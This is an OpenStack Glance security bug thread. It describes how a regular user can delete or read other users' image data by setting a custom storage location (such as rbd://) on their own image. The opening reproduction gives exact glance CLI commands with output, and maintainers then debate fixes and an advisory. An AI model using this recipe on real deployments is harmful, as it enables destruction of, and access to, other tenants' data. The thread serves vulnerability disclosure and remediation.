Regular user in non-default non-recommended configuration can delete any image file

Bug #1546507 reported by Mike Fedosin on 2016-02-17
40
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Glance
Critical
Mike Fedosin
Liberty
Critical
Unassigned
Mitaka
Critical
Unassigned
Newton
Critical
Unassigned
Ocata
Critical
Mike Fedosin
OpenStack Security Advisory
Undecided
Unassigned
OpenStack Security Notes
Undecided
Unassigned

Bug Description

Any user can delete any public image data or get access to private image just knowing the image id.

Glance allows to add custom location to image and this behavior is really harmful.

Scenario of deleting image data in Ceph backend with current devstack configuration

1. User gets list of images:
mfedosin@winter ~ $ glance image-list
+--------------------------------------+----------------------------+
| ID | Name |
+--------------------------------------+----------------------------+
| 0741cbc7-6b9f-4eb4-a666-9743a186849e | debian-8-m-agent.qcow2 |
| 2e4b6dca-9700-4715-b81d-4463cd7038de | TestVM |
| 39599dd3-35cb-4893-b5d4-1a17e23e538a | ubuntu14.04-x64-docker |
| 153397f8-d5e5-43d1-9a08-5fc52bda11a4 | ubuntu14.04-x64-kubernetes |
+--------------------------------------+----------------------------+

2. User requests info about public image he wants to delete:
mfedosin@winter ~ $ glance image-show 2e4b6dca-9700-4715-b81d-4463cd7038de
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | ee1eca47dc88f4879d8a229cc70a07c6 |
| container_format | bare |
| created_at | 2016-02-11T03:38:09Z |
| direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- |
| | 4463cd7038de/snap |
| disk_format | qcow2 |
| id | 2e4b6dca-9700-4715-b81d-4463cd7038de |
| min_disk | 0 |
| min_ram | 64 |
| name | TestVM |
| owner | 1c6cea59a6054372b10acbab8e25e415 |
| protected | False |
| size | 13287936 |
| status | active |
| tags | [] |
| updated_at | 2016-02-11T03:38:30Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+

Optional: User may try to download image file with "glance image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file gg"

3. User copies direct image url: from 'direct_url' or 'locations' field
rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap

4. User creates new image instance in db and sets custom location with "glance --os-image-api-version 1 image-create --location" (v1) or "glance location-add --url" (v2)
mfedosin@winter ~ $ glance --os-image-api-version 1 image-create --location "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" --disk-format qcow2 --container-format bare --name rerere
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2016-02-17T11:54:41.000000 |
| deleted | False |
| deleted_at | None |
| disk_format | qcow2 |
| id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 |
| is_public | False |
| min_disk | 0 |
| min_ram | 0 |
| name | rerere |
| owner | fa343a042d2b47cbbeab08cca9913679 |
| protected | False |
| size | 13287936 |
| status | active |
| updated_at | 2016-02-17T11:54:44.000000 |
| virtual_size | None |
+------------------+--------------------------------------+
Optional: User may try to verify that image has desired location
mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2016-02-17T11:54:41Z |
| direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- |
| | 4463cd7038de/snap |
| disk_format | qcow2 |
| id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 |
| min_disk | 0 |
| min_ram | 0 |
| name | rerere |
| owner | fa343a042d2b47cbbeab08cca9913679 |
| protected | False |
| size | 13287936 |
| status | active |
| tags | [] |
| updated_at | 2016-02-17T11:54:44Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+

5. User deletes his image. Image data will be deleted too.
glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
mfedosin@winter ~ $ glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
404 Not Found: No image found with ID b12c6965-c6f8-4272-a8a0-453fc0fc03e2 (HTTP 404)

6. Trying to access public data will failed after that.
mfedosin@winter ~ $ glance --debug image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file ggg
curl -g -i -X GET -H 'Accept-Encoding: gzip, deflate' -H 'Accept: */*' -H 'User-Agent: python-glanceclient' -H 'Connection: keep-alive' -H 'X-Auth-Token: {SHA1}49eea3cf13d0aba2b76665245eab8cc45fb08342' -H 'Content-Type: application/octet-stream' http://192.168.0.2:9292/v2/images/2e4b6dca-9700-4715-b81d-4463cd7038de/file

HTTP/1.1 204 No Content
Date: Wed, 17 Feb 2016 12:01:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0
X-Openstack-Request-Id: req-d77148fb-fd4b-4f7b-a646-30f494c480dd

Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/glanceclient/shell.py", line 605, in main
    args.func(client, args)
  File "/usr/local/lib/python2.7/dist-packages/glanceclient/v2/shell.py", line 281, in do_image_download
    utils.save_image(body, args.file)
  File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 305, in save_image
    for chunk in data:
  File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 478, in __iter__
    self.iterable.close()
AttributeError: 'NoneType' object has no attribute 'close'
'NoneType' object has no attribute 'close'

mfedosin@winter ~ $ glance --version
1.2.0

Affected apis:
all v1 api without any chance to fix it - v1 always allows to set custom locations.
v2 api when 'show_multiple_locations' is enabled (default - False)

Affected schemes:
All, except 'swift+config' and 'file', because custom locations are forbidden for them.

If user knows private image id he can build and set custom location to his personal image, therefore get an access to private data.

Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.

description: updated
Changed in ossa:
status: New → Incomplete

A couple of questions:

* The private image id is only shown for image which have a location (direct_url field) ?
* User can delete any image which have that direct_url, but it doesn't seems to affect image without location right ?

Stuart McLaren (stuart-mclaren) wrote :

Thanks Mike.

I'm guessing some non-default configuration options are required to enable this? (eg, show_image_direct_url?)

    cfg.BoolOpt('show_image_direct_url', default=False,
                help=_('Whether to include the backend image storage location '
                       'in image properties. Revealing storage location can '
                       'be a security risk, so use this setting with '
                       'caution!')),

> sets custom location

Does this also need a non-default config option?

    cfg.BoolOpt('show_multiple_locations', default=False,
                help=_('Whether to include the backend image locations '
                       'in image properties. '
                       'For example, if using the file system store a URL of '
                       '"file:///path/to/image" will be returned to the user '
                       'in the \'direct_url\' meta-data field. '
                       'Revealing storage location can '
                       'be a security risk, so use this setting with '
                       'caution! '
                       'Setting this to true overrides the '
                       'show_image_direct_url option.')),

Should we plan to restrict the xxx_image_location policies by default? eg,

    "set_image_location": "",

In your example you're using the rbd store. Is there a set of options which allow using that store safely? eg can show_image_direct_url be set to 'false' and show_multiple_locations be set false for that store?

It seems that this may be worse for some stores than others. Eg if users have configured the swift store the old fashioned way they may get the credentials for the swift single tenant user -- allowing deleting *all* users' images, including private images, and also injecting bad images (though the checksum will provide some protection).

If access to the locations via the Glance API is required for some stores to work, should we consider restricting their display to 'admins' or the image owner by default?

Stuart McLaren (stuart-mclaren) wrote :

My understanding (which may not be 100%) is that the rbd location is used by Cinder.

If a user wants to create a new volume from an existing image this can be done in two ways:

1) the image can be streamed as usual
2) if the image backend is rbd, and the location is known, a short cut can be taken: the image bytes don't need to be streamed. Instead a quick clone of the backing volume can be performed.

If the consumer of the location field is typically another OpenStack service (Cinder/whatever) it may be worth considering using Service Tokens here.

We could only expose the location if the request contained a particular role granted by a Service Token. In that way the end user wouldn't see the locations but other OpenStack services could.

Mike Fedosin (mfedosin) wrote :

@Tristan
"* The private image id is only shown for image which have a location (direct_url field) ?"
I hope I got you right here... Image id is shown every time. It doesn't matter if image has a location or not.

"* User can delete any image which have that direct_url, but it doesn't seems to affect image without location right ?"
In common case I suppose it's true. But for example for Ceph you can form the url to desired file just as 'rbd://{image_id}'.
So you don't need to see direct url, you can form it from image id.

Mike Fedosin (mfedosin) wrote :

@Stuart
As I mentioned, forbid showing direct image url won't help, at least for Ceph. Because you can form it as 'rbd://{image_id}'

Stuart McLaren (stuart-mclaren) wrote :

@Mike

The example location you gave is:

 rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap

'2e4b6dca-9700-4715-b81d-4463cd7038de' is the image id.

What's '647f7ae8-648a-44f5-83ad-f7bd2299274e'? Do you need to guess that as well, or is that something which is also known?

Mike Fedosin (mfedosin) wrote :

It's a cluster id, it can be specified, but it's not necessary. Glance store creates these url by default.

"rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" and "rbd://2e4b6dca-9700-4715-b81d-4463cd7038de" are equal.

Thank you Mike for the detailed explanation, I misread the "private image id" as the cluster id.

If I understand correctly, this bug happens when a user creates an image with a location set to another image location.
Can't glance prevents setting a single location to multiple image ?

Mike Fedosin (mfedosin) wrote :

Now there is no ability to prevent it. In v2 this behavior is disabled by default, but v1 always allows setting a single location to multiple image.

Today we're discussing about adding uniqueness to location urls in glance db. But it won't help, at least for Ceph backend, because there are several ways to get an object from store (see my post #8). So I found only one easy solution - if url scheme is not 'http(s), then deprecate adding custom location if url doesn't contain original image id. It prevents adding link to external images.

I wrote this code and now I'm testing it and developing tests. I believe I'll upload a patch very soon.

Flavio Percoco (flaper87) wrote :

Mike,

Thanks a lot for reporting this issue, which I believe is quite critical.

As Stuart mentioned, exploiting this security issue requires some non default config options to be set. That said, I believe some of our default policies are too permissive. Stuart pointed the `set_image_location` policy and I believe it should be admin only by default.

We could also explore the possibility of not returning the image's location for public images. I believe this could be configured in the policy file.

In addition to the above, I believe we should seriously consider deprecating v1 entirely in N and disabling it by default in O.

I'd like to hear Hermanth thoughts on this as well.

Mike Fedosin (mfedosin) wrote :

Thanks for your response Flavio!
"As Stuart mentioned, exploiting this security issue requires some non default config options to be set." It's not correct in common case, because for Ceph you don't need to know direct_url - you can build it as "rbd://{image_id}". So there is no possibility to avoid this bug when v1 is enabled.

I created a fix for that (my god... it's 5AM here) and it works for me. What can you say about this solution?

@Mike

Your patch prevents setting arbitrary locations for all users, in all cases, including admins.

Could that be a problem? For example, say an admin has a workflow where they set the location to some pre-existing data.

> v1 always allows setting a single location to multiple image.

My understanding is that you can currently deploy v1 securely (using policies to prevent directly accessing locations), but you may get a performance hit for some operations, eg create image from volume/create volume from image. (But I'm not as familiar with the ceph store as others.)

Would a solution where a regular user can not set a location at all, but an admin or openstack service can set whatever they want be ok?

Mike Fedosin (mfedosin) wrote :

It's easy to update the patch and allow admin to set any location he wants. Also we can update it later to allow services to do the same when service token support is added.

If it's only one concern I'll write the code and related tests tomorrow.

Changed in ossa:
status: Incomplete → Confirmed
importance: Undecided → Critical

I agree with Stuart about the patch being a little too restrictive. I'm sure there must be a decent number of use-cases where setting the location to pre-existing data is needed. So, I'm inclining towards a policy-based solution to restrict any user apart from admin be able to set locations on an image at all.

Preventing regular user to use the glance image location seems like a regression... would this be accepted for stable branch ?

Flavio Percoco (flaper87) wrote :

We're working on a different solution for this. Let's dig a bit more and see what we can do. This is not an easy one.

> Preventing regular user to use the glance image location seems like a regression

1) This would be a more restrictive default policy rather than anything hard coded.

I've always considered exposing the locations to be exposing some of Glance's internals. (I know there are different opinions on this.)

I think the location stuff was made available for anyone who wanted to switch it on, but we put warnings on the config options -- -- "security risk" (with exclamation points!) -- because anyone who is concerned about security really shouldn't be giving direct access to the locations to regular users. There's just too much scope to do bad things (eg this bug).

We can try to make the location stuff less amazingly insecure, but I think that anyone who has enabled it to date should have been aware of the dangers of enabling it for all users.

Deployments which don't allow direct access to the locations for all users will *always* have a much smaller attack surface.

2) As far as I'm aware the killer use case for allowing access to the locations is for performance wins where Cinder can avoid streaming all the image data.

This doesn't require the end user to access the location, just the Cinder service on behalf of the user. This could be done with service tokens.

Mike Fedosin (mfedosin) wrote :

> Deployments which don't allow direct access to the locations for all users will *always* have a much smaller attack surface.

The problem is EVERY deployment allows direct access to the locations for all users with v1's --location. And it's not about policies or config params. It's always enabled, and deprecating --location in v1 is a huge API impact and also it will break Nova, which uses this option.

Using service tokens is a solution, at least for Nova, but it's a feature and we have to think of porting the fix to stable branches. So, to fix it we need:
1. Deprecate v1, declare it insecure and remove from every existing deployments.
2. Add 'service_token' support for Glance and Nova, Cinder, Heat, Ironic...
3. Forbid regular users to set custom locations in v2 API with policies.
Frankly speaking it's rather hard for me...

From my side I suggest an easy, but working solution, that prevents this type of attack - allow regular users setting custom locations only if scheme is 'http(s)' or url contains image id.

Mike Fedosin (mfedosin) wrote :

Several changes were made after discussion about this bug:
1. Return the ability to set any locations to admin.
2. Kill image in v1 if location was invalid.
3. Message was updated to more understandable.

Flavio Percoco (flaper87) wrote :

Mike,

thanks for the new patch. We're getting closer.

Unfortunately, I don't think the check for valid external URI's is good enough. If I create an empty image and set my own location, which doesn't have the image id in it, I'll still be able to exploit this. Should we check in the DB and see if the location is being used?

Stuart, comments?

@Mike

> The problem is EVERY deployment allows direct access to the locations for all users with v1's --location. And it's not about policies or config params. It's always enabled

I'm not sure I understand this comment. Reading it at face value, it's saying that literally every existing deployment allows users to directly change locations, and there is nothing (no config change or policy change) that the operator can do to prevent it.

But I find that if I change the following in policy.json

    "delete_image_location": "role:admin or role:glance_admin",
    "get_image_location": "role:admin or role:glance_admin",
    "set_image_location": "role:admin or role:glance_admin",

Then a user is not allowed set the location via the v1 CLI:

 $ glance --os-image-api-version 1 image-create --disk-format raw --container-format bare --name x1 --location http://www.google.com
403 Forbidden: Access was denied to this resource. (HTTP 403)

In my experience it is possible to disallow the direct image location manipulation via policies without breaking nova (again, in my experience, this is what larger deployments will typically do).

> and also it will break Nova, which uses this option.

It may be that Nova can take advantage of directly manipulating locations in some cases (Mike -- do you have more details on what nova does here?) but I don't think directly manipulating the locations is a requirement for a working Nova.

+1 to Stuart's assessment.

Mike, how does it break nova? From what I understand, Nova doesn't depend on the location stuff to create images. Let me know what I'm missing here.

Keeping the attack vector aside, is there a fundamental issue here?
As a user, can I shoot myself in the foot by setting the same location to multiple images and when I delete one of these images, the others are now gone too ?

Essentially, should glance start treating the locations that were 'set' differently to the locations that it creates itself?
If a user sets the location on an image, then the data wasn't uploaded through Glance. So, why should Glance delete the data that it did not upload? Can we just 'unset'/soft-delete the location?

@Flavio,
"If I create an empty image and set my own location, which doesn't have the image id in it, I'll still be able to exploit this."

With Mike's patch, one won't be able to set any location that doesn't have the image id present in it. Well, unless it's HTTP.
If the public image has an HTTP location (and it is exposed), then this exploit is still possible I guess.

So, it looks like this patch essentially reduces the attack vector to a great extent.
Or did I get something wrong? :)

Flavio Percoco (flaper87) wrote :

Hermanth,

Good catch,

I think I meant "which does have". That is, if I 'm able to create a fake location with the image id, it'll pass Mike's check and it'll be used. Am I missing something?

Grant Murphy (gmurphy) wrote :

First draft at an impact description
--

Title: Unauthorized image deletion in Glance
Reporter: Mike Fedosin (Mirantis)
Products: Glance
Affects: <=2015.1.3, <=11.0.1

Description:
Mike Fedosin from Mirantis reported a vulnerability in Glance that allows any authenticated
user to delete a public image. If a user creates an image with the same custom location as
a public image, the public image data will also be deleted when the user deletes their image.
All setups that allow custom image locations are affected. Glance services using the V2 API
will only be affected when the configuration value show_multiple_locations is set as 'True';
by default this option is not enabled.

Grant, the affects line needs to be: "<=2015.1.3, >=11.0.0 <= 11.0.1". Otherwise LGTM

Mike Fedosin (mfedosin) wrote :

Hey! I was busy last week, so didn't pay to much attention for this bug... I think I should be more precise here.

First of all, that's for sure that operator can disable setting custom locations with policies. And it was the first thing I tried to do. Unfortunately it leads to the fact that several tempest tests fail - all of them from Nova:
tempest.api.compute.images.test_images.ImagesTestJSON.test_create_image_from_stopped_server
tempest.api.compute.images.test_list_image_filters.ListImageFiltersTestJSON
tempest.api.compute.images.test_images_oneserver.ImagesOneServerTestJSON.test_create_delete_image
tempest.api.compute.images.test_images_oneserver.ImagesOneServerTestJSON.test_create_image_specify_multibyte_character_image_name
tempest.api.compute.servers.test_server_actions.ServerActionsTestJSON.test_create_backup
tempest.api.compute.servers.test_delete_server.DeleteServersTestJSON.test_delete_server_while_in_shelved_state
tempest.scenario.test_snapshot_pattern.TestSnapshotPattern.test_snapshot_pattern
tempest.scenario.test_shelve_instance.TestShelveInstance.test_shelve_instance
tempest.api.compute.servers.test_servers_negative.ServersNegativeTestJSON.test_shelve_shelved_server
tempest.api.compute.servers.test_server_actions.ServerActionsTestJSON.test_shelve_unshelve_server

It made me say that disabling custom locations breaks Nova. All of these tests fail only for Ceph deployments, Swift pass.

My second though was to add requirement of uniqueness for locations, but it doesn't work (at least for ceph), because there're several ways to define url for an image. For example, "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" and "rbd://2e4b6dca-9700-4715-b81d-4463cd7038de" are equal. Adding workarounds for these cases with regexp is not an option, I suppose.

My final thought was to restrict what type of locations user may set - at first it was only http(s), but then I found a pattern, where each glance location contains image identifier. It allowed to smooth the requirement and also permit users to set locations that contain original image id.

Let's see how it works:
1. Assume we have good public image with id "good-public-image". Image file has a link "rbd://good-public-image"
2. Attacker wants to destroy the data and creates his own private image with id "malicious-image".
3. Then he tries to set custom location to his image: "rbd://good-public-image", but it fails, because this url doesn't contain id of his own private image, i.e. "malicious-image".

About the solution - it completely eliminates the possibility of this type of attack, but adds some restrictions for honest users. I think we can consider it as a good workaround, but in Newton we have to define a better one. I suppose we can implement a solution that was proposed for Glare service - define what type of locations (custom or not) we have. You can read about it here https://review.openstack.org/#/c/283136/2/specs/newton/glare-api.rst LL 136-142.

Mike, that workaround looks good, but are we considering it for stable branch too ?

Also, it seems like you assume glance location always contains image identifier, but is this true also for image location set manually (e.g., when using a direct swift url to a custom file) ?

Mike Fedosin (mfedosin) wrote :

Hi! This fix is for stable branches only, because in Newton we will implement it in a right way and finally separate locations in two groups: those which were created by user and those which were created by Glance itself. In first case Glance won't delete files if user deletes image.

Yes, we assume that glance location always contains image identifier - it's not the best approach, but it's lesser of all evils. Frankly speaking in my opinion allowing users to set custom locations is very insecure thing - Glance works with admin privileges and it can read or delete any data in storage. But in my solution if user (not admin) really needs to upload any file directly without Glance and set the location to his image, he is able to do it.
He should perform next steps: 1. Create image instance in DB and get its ID. 2. Then upload file directly to store with the same name as the ID. 3. And finally set custom location to his image.
And I'm going to say it again - other workflows are really insecure and must be rejected, setting custom locations for any existing files may lead to the fact that malicious user may read or delete some sensitive data, and it's not necessary to be an image file.

Thank you Mike for the extra details. So basically the workaround seems to add a new requirement to location uri: they now must contains image uuid.

Should we subscribe Tony Breeds as a Stable branch maintainer to check if this workflow/behavior change is acceptable ?

Mike Fedosin (mfedosin) wrote :

One addition: the requirement is "they now must contain the original image uuid" and this requirement does not apply to cloud administrators and 'http' locations.

More feedback is good, so yeah - invite Tony Breeds here :)

Tony, here we are considering removing the ability to use url without image uuid for image location. Since it's a behavior change, we wonder if that's an acceptable evil (stable branch wise) to workaround above issue. What do you think ?

If I'm reading the patch correctly, we're hardcoding that only an admin can set arbitrary locations:

 if not(req.context.is_admin or utils.validate_external_url

Previously it was possible to use the policy file to give permissions to just specific roles/users to set arbitrary locations, eg:

 policy.json:
    "set_image_location": "role:whoever",

It may be a corner case, but if someone has a workflow that requires a non-admin (but hopefully trusted user) to set an arbitrary location the current patch would prevent that.

Could we do something like have a new policy that would cover that case, eg:

 "set_unrestricted_location": "role:whoever"

That would give us three policy defined sets:

1. Users that can't set locations at all
2. Users that can set locations to allowed values only
3. Users that can set location to any value

Mike Fedosin (mfedosin) wrote :

Good suggestion Stuart. I'll update the patch today.

Hi, I just read through the bug (as I was not involved earlier). I think we need to define what the exact workflow is being proposed here.

It seems like we need to clarify in one complete outline of the proposal the following things:

1. two non-default config options need to be enabled for v2, single location can always be set for v1?

2. some policy changes in the source tree that will restrict access to regular users (including project admins?) (for both v1 and v2?)

3. Nova uses (v1) direct access to locations in libvirt driver ( https://github.com/openstack/nova/blob/824c3706a3ea691781f4fcc4453881517a9e1c55/nova/virt/libvirt/imagebackend.py#L967 and https://github.com/openstack/nova/blob/824c3706a3ea691781f4fcc4453881517a9e1c55/nova/virt/libvirt/driver.py#L1517 )
Is setting default policy to be restrictive going to break this for those users?

4. The primary use case of image-locations is for operators to specify fully customized (with glance's location comprehension constraints) for being able to specify those that are near to some services like nova (using v2). This is to boost boot times and reduce network lags and errors. Will the admins be able to set the image location as they find convenient?

5. What will happen to existing images in the DB that were stored by specifying a image location that contains identifier that's not image id?

Based on above comment and other related issue (bug 1549483 and bug 1555590), I'd like to handle image-location issues as class B2 type of bug according to VMT taxonomy ( http://security.openstack.org/vmt-process.html#incident-report-taxonomy ).

I'm switching the OSSA task status to opinion until a Security Note (OSSN) is defined.
However if a backportable fix can be implemented, then we can revert that decision and issue an advisory.

Changed in ossa:
status: Confirmed → Opinion
Mike Fedosin (mfedosin) wrote :

Now operators are able to specify with policy what users can set any locations.

summary: - Regular user can delete any image file
+ Regular user in non-default non-recommended configuration can delete any
+ image file
59 comments hidden view all 139 comments

Comments on "Fix based on the work of Mike and Feilong" patch
https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4788885/+files/0001-Prevent-setting-locations-to-other-images.patch

I think the basic logic is OK, these are just a few things I noticed.

glance/location.py:
Two questions:
(1) Should we add a log message if we don't delete the backend data,
something like
"Data at %s not being removed as image %s does not appear to own it"
 % (location, image_id)

(2)if we do decide it's ok to delete the data, but len(locs) > 1,
should we provide a list of the locations that are now invalid (along
with the image ids that own those locations?

glance/api/v1/images.py:
glance/api/v2/images.py:
The exception message isn't quite accurate. Something like
"The location '%s' is forbidden for the configured store"
would be better.

glance/common/utils.py:
validate_external_url():
The NOTE is misleading. The function only checks to make sure the URL
contains the image_id of the image that owns the location being set.
It doesn't actually check to see if the location is in use by another
image.

glance/tests/unit/v1/test_api.py:
test_update_add_direct_rbd_location():
The location is 'rbd://another_image_id' for an image whose id is
'this_image_id', and the test correctly expects to get a 403.
We should also check that when location is 'rdb://this_image_id'
we get a 403, since that's supposed to be a disallowed URL.
(same thing in the v2 version of the test)

test_update_add_snap_styled_rbd_location():
Similar question, except this time, do we need a test to make
sure that a proper snap-style location, that is,
location = 'rbd://fsid/pool/%s/another_image_id' % image_id
returns a 2xx?
(same question about the v2 version)

By the way ... not sure if it makes sense to change this patch, but
someone went through the codebase recently and changed all the
numeric response codes to symbolic constants:
  from six.moves import http_client
and then use, for example, http_client.FORBIDDEN

Was doing some more thinking about the Mike/Fei Long patch.

I'm worried about the image_locations_with_url() function. Isn't
it going to trigger a full scan of the image_locations table for
each delete? That seems like a very expensive operation.

The other thing that occurred to me was that in the swift case,
a malicious user could set the image location to a segment of a
public image. If the segment were deleted, the entire image would
be rendered useless. I guess what I'm getting at is that if this
function only covers some cases, maybe we shouldn't include it,
especially since it seems very expensive.

What do you think?

Ian Cordasco (icordasc) wrote :

Brian, you're right that the patch as it's written will trigger full table scans. We're querying on the value column which isn't indexed (and probably can't be efficiently indexed).

Ian Cordasco (icordasc) wrote :

We do index on the image id though. We're already checking that the image id that's part of the request and the image id in the location match when we add the URL. Can we use that same validator in there to skip full-table scans unless we determine they're absolutely necessary?

Ian Cordasco (icordasc) wrote :

I guess what doing that check doesn't do is ensure that another image using the same location won't become useless via the same problem.

Was looking at this again. Fei Long, in your patch, the new code in _do_add_locations() raises exception.Forbidden. The current code raises webob.exc.HTTPForbidden (proceeding if block, when show_multiple_locations is False). Should your patch be using the webob exception in this spot?

This has me worried. In comment #79, Tomoki says:
Cinder store uses an url like 'cinder://<cinder-volume-uuid>' which does not include image-uuid

In Fei Long and Mike's patch, validate_external_url() is going to return False in this case, which would not allow setting any cinder urls -- or am I missing something?

Ian Cordasco (icordasc) wrote :

You're not missing anything Brian. You're 100% correct.

Adding Anton Chevychalov from Mirantis to this bug. He says they have a fix that's been tested in MOS that they want to contribute upstream.

Anton, please read through the bug (at least from comment #85 to the end), and let us know how your fix addresses the concerns about the current Fei Long/Mike Fedosin patch.

Mike Fedosin (mfedosin) wrote :

Lol :) Mirantis has my old fix, that's already attached here.

Yep. And It was merged in assumption that it will be merged in upstream short. Obviously it is not right :)

Quick summary of where we are now:

(A) The situation:

Exploit can occur under *both* of the following conditions:
(1) show_multiple_locations=true (default is *false*)
    ==> deprecated in Newton, supposed to be removed in Ocata
(2) set_image_location policy allows user to set location (default is *admin* since Newton)

Even if (1) is removed in Ocata, a version of this problem will continue, plus that wouldn't help the stable branches anyway.

My understanding is that ceph and cinder are the most likely backends to be configured in this non-default way.

(B) stores and vulnerability assessment

The short story:
http, filesystem not vulnerable
cinder: vulnerable, requires patch, will be broken by requiring image_id in url
rbd, sheepdog, vmware, swift: vulnerable, requiring image_id in url is OK and will fix

We need to determine whether cinder could also require an image_id in the url for new images without breaking (i.e., is it that cinder *cannot* or *does not* do this now). Also, cinder can be configured in a kind of single-tenant mode (like swift), I'm not sure that the proposed patch prevents the exploit when in single-tenant mode.

One other thing about the fix ... it has to take into account all supported stores. Bringing that up because I was thinking that because of the cinder situation, we could maybe let the store being used say what counts as an OK url. But we cannot do that because it's possible for glance to have multiple stores (it can only use the default store for uploads, though). There was a bug Stuart fixed about the "swift+config://" scheme that reminded me of this:
https://bugs.launchpad.net/glance/+bug/1334196
So we have to worry about a case where a deployer uses ceph and then decides to add cinder as the default store--we still need to check a rbd:// url if a user adds it as a location. (The current Fei Long/Mike patch correctly does this; my point is just that as we're converging on a fix, we need to keep this in mind.)

Correction about my comment above about the cinder patch, it specifically addresses the single-tenant case.

Tomoki Sekiyama (tsekiyama) wrote :

Unfortunately cinder doesn't have hierarchy, like the path in filesystem and
swift, so it does not work meaningfully in cinder...
We could add some scheme to use volume names as URL to name it arbitrarily,
but it also have problem since multiple volume can have the same name..

Currently, instead of the URL, cinder will store the image_id and image
owner's project id in the volume metadata named "image_owner", which can be
obtained by "cinder show" or cinderclient.volumes.get(volume_id) method.
Especially in single-shared-user mode, it must be checked to restrict
manipulation by non-authorized users.

My patch for cinder store driver attached to this bug will add the check
for image owner's project id. It gets volume data from cinder based on the URL
"cinder://<uuid>", and allows to add location only if its "image_owner" metadata
shows that same owner with the image.
# Note that the metadata can only be set or modified by the owner.

People: There is no way this is going to make Ocata unless we have some action on it in the next 24 hours (and even then, it's a stretch). I realize that we're working across crazy time zones--Moscow/New York/Wellington/Tokyo--so we really need to communicate here to keep track of what we're working on. But even if we miss Ocata, we need to push on this hard and kill it off.

Fei Long/Anton: please coordinate on a new patch that takes into account comments #100, #101, #105, plus please correct the name of the new policy target in the commit message. Additionally, we're going to have to completely skip the checks for the "cinder://" scheme in the validate_external_url() utility function. I suggest a new block like the one for http, but with a comment saying the cinder check will happen in the backend driver because the cinder url path is not predictable. (Also, please make sure to read my "everyone" comment below.)

Tomoki (and people with general glance_store knowledge): I am worried that cinder in single-shared-user mode will be vulnerable to the exploit filed against swift as https://bugs.launchpad.net/glance/+bug/1334196 . This would be the case if multiple backends are configured for a glance installation; if cinder isn't the default, a user could set a "cinder://<volume_id>" url location on an image (having copied the url from a public or shared image) and the non-cinder backend will allow this location to be set. (Feel free to tell me I'm wrong about this.) If so, I think you should add a check to the cinder driver's delete() function to make sure the requestor owns the volume before deleting the volume to protect against this case.

Everyone: I don't like the complete table scan in the Fei Long/Mike patch's image_locations_with_url() function. My understanding is that this is there to deal with the "incurred" case (i.e., someone has used this exploit before the current patch, which will prevent setting "bad" urls, is in place. I think instead of including this function in the code, we should advise operators who may have exposed themselves to this vulnerability to turn on delayed_delete and handle detection of duplicate urls offline. Thoughts?

Thanks, everyone ... let's get cracking on this!

Tomoki Sekiyama (tsekiyama) wrote :

Brian,

As far as I've tested, even if location (x-image-meta-location) is specified in the POST v1/images API, and even if the cinder is not the default store, the location is passed to the cinder store driver and the owner is checked with my patch.

Just in the case, I have added the owner check to delete() and get() too.
Unit tests are also added in the patch v3.

Tomoki: Thanks for your quick response!

I thought that we have intention to remove show_* options in Ocata. I was wrong?

Anton: removing show_multiple_locations has been delayed (it's the subject of an OSSN that's about to come out where if show_multiple_locations=False there's nothing to worry about, so we didn't want to remove it now and complicate the situation).

The show_image_direct_url option is not scheduled for removal AFAIK.

Brian, I see no way for me to give us a result today. I need to improve my understanding of that patches and current usage of Glance in our product. Besides that is not my only task for today. I'm sorry but I think we should not make such patches in a hurry.

Anton, I respect your position--you have joined us only recently on this, and it looks like Fei Long is not actively working on the patch right now. Even though we'll miss RC-1, let's keep working on this. It would be good to have a fix that we could backport to the stable branches.

Feilong Wang (flwang) wrote :

Sorry for the late response here, I'm going to pick up this again. And I'm curious if gerrit can do a private review because the patch review on launchpad is really annoying.

Unfortunately gerrit doesn't support private review, and embargoed bug's patch review needs to happen on launchpad.

@Fei-Long: thanks for picking this back up. I'll keep a close watch and will review any new patches as soon as possible. Let's aim to finish this by R-17 (it's R-20 now; R-17 is the week before the summit/forum).

Fei Long, Erno, Nikhil, and I were able to discuss this issue at the Boston Summit/Forum and decided that we need to implement reference counting in order to have a robust solution. Since that is going to have a serious impact on the code, we agreed that we need to have a spec explaining how the fix will work. Since this bug is still private, the spec is attached here as a patch instead of being submitted to gerrit for review.

